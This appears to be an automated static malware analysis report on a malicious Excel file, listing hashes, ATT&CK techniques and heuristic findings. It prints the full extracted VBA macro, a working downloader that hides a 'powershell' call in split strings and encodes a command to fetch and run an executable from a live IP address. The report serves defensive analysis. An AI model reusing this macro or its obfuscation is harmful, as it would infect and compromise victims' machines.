Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3c7bc2687873dbaa…

MALICIOUS

Office (OOXML)

363.9 KB Created: 2021-08-19 14:03:52 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-10-24
MD5: 04b544c1c94993b5498b125c5a7fab0f SHA-1: 26f19abbb7ffb375e181874c8cefb10c1b358f3e SHA-256: 3c7bc2687873dbaaed3c7059b315978c3e216a0bf65fa1d06f762b93f58cd807
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a macro-enabled Excel document containing VBA code that uses obfuscation to reassemble the string 'powershell'. This PowerShell command is then used to download and execute a second-stage payload from the URL 'http://3.64.251.139/vm2/2/HT_10025845102.exe'. The use of Shell() and obfuscated PowerShell execution indicates a malicious intent to download and run further malware.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2542 bytes
SHA-256: 317333d0b9e55a95161163c761c6038191dc36e32dc58d619fdd81cf8b8bc97c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Workbook_Activate()
On Error Resume Next

Dim bat As String


Dim s As String

s = s + "start "
Dim a As String
s = s + "/MI" + "N C:\Wi" + "ndo"
Dim dfdf As String
s = s + "ws\Sys" + "tem32\" + "Wind" + "owsPo" + "wer"
Dim fwefewf As String
s = s + "She" + "ll\v1.0" + "\pow" + "ersh" + "ell." + "exe"
Dim ewfwef As String
s = s + " -win " + "1 -e" + "nc "


s = s + "JABQAHIAbwBj"
s = s + "AE4AYQBtAGUA"
s = s + "IAA9ACAAIgBQ"
s = s + "AGsAagBwAHoA"
s = s + "bQBvAGMAeQBn"
s = s + "AHAAaAB1AGMA"
s = s + "bQByAGsAcgBn"
s = s + "AGYAegB1AHMA"
s = s + "dgAuAGUAeABl"
s = s + "ACIAOwAoAE4A"
s = s + "ZQB3AC0ATwBi"
s = s + "AGoAZQBjAHQA"
s = s + "IABTAHkAcwB0"
s = s + "AGUAbQAuAE4A"
s = s + "ZQB0AC4AVwBl"
s = s + "AGIAQwBsAGkA"
s = s + "ZQBuAHQAKQAu"
s = s + "AEQAbwB3AG4A"
s = s + "bABvAGEAZABG"
s = s + "AGkAbABlACgA"
s = s + "IgBoAHQAdABw"
s = s + "ADoALwAvADMA"
s = s + "LgA2ADQALgAy"
s = s + "ADUAMQAuADEA"
s = s + "MwA5AC8AdgAz"
s = s + "AC8AMgAvAFAA"
s = s + "VABMAF8AMQAw"
s = s + "ADAAMgA1ADgA"
s = s + "NQA0ADEAMQAw"
s = s + "ADIALgBlAHgA"
s = s + "ZQAiACwAIgAk"
s = s + "AGUAbgB2ADoA"
s = s + "QQBQAFAARABB"
s = s + "AFQAQQBcACQA"
s = s + "UAByAG8AYwBO"
s = s + "AGEAbQBlACIA"
s = s + "KQA7AFMAdABh"
s = s + "AHIAdAAtAFAA"
s = s + "cgBvAGMAZQBz"
s = s + "AHMAIAAoACIA"
s = s + "JABlAG4AdgA6"
s = s + "AEEAUABQAEQA"
s = s + "QQBUAEEAXAAk"
s = s + "AFAAcgBvAGMA"
s = s + "TgBhAG0AZQAi"
s = s + "ACkA"


Dim x As Double

ActiveWorkbook.Save

bat = "Pyycczdeiczsesktxlm.bat"

Open bat For Output As #1
    Print #1, s 
    Close #1
    x = Shell(bat, 0)

End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes
SHA-256: 8a4d7a3099bdf411a28fc8bd0ccdc6d85c1e08b9bce2479dde9c306ba5ecd5d9

Open this report in the interactive analyzer, or submit your own file for analysis.